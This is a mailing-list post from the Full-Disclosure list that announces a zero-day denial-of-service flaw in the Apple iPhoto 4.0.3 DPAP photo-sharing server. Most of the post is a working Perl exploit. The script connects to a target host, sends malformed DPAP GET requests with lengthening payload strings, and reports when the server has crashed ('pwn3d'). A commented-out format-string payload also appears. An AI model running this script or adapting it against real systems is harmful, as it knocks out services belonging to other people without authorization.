A little zero-day exploit in memory of Dude VanWinkle. Apple iPhoto v4.0.3 DPAP (Digital Photo Access Protocol) Server Denial of Service Exploit. Other versions may be vulnerable too; the current version should not be vulnerable. The server process catches the exception, exits cleanly, but does not restart. This exploits a previously undisclosed vulnerability. -David Wharton --- #!/usr/bin/perl # crash the iPhoto DPAP (Digital Photo Access Protocol) Server on iPhoto 4.0.3 # technically the server exits cleanly but it does not restart use IO::Socket::INET; die "Usage $0 \n" unless ($ARGV[0]); $| = 1; if ($ARGV[1]) { $port = $ARGV[1]; } else { $port = 8770; } $socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[0], PeerPort=>$port, Proto=>'tcp'); if ($socket == NULL) { die "Cannot connect to $ARGV[0] on port $port\n"; } $malformed_data = "AAAAAAAAAAAAAAA"; #$malformed_data = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"; $count = 0; $msg="GET dpap://$malformed_data HTTP/1.1\r\n\r\n"; print "Sending message:\n$msg\n"; $socket->send($msg); $socket->close(); sleep(1); $cont = 1; # this loop is unnecessary but who cares while ($cont && $count < 11) { $socket2 = new IO::Socket::INET->new(PeerAddr=>$ARGV[0], PeerPort=>$port, Proto=>'tcp'); if ($socket2 == NULL) { $cont = 0; print "crash\n"; } else { print "."; # next line not necessary but does the job too $malformed_data = $malformed_data.$malformed_data; $msg="GET dpap://$malformed_data HTTP/1.1\r\n\r\n"; $socket2->send($msg); $count++; $socket2->close(); sleep(1); } } if ($count < 10) { print "iPhotoDPAPServer on $ARGV[0] has been pwn3d\n"; } else { print "Unable to crash iPhotoDPAPServer on $ARGV[0]\n"; } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/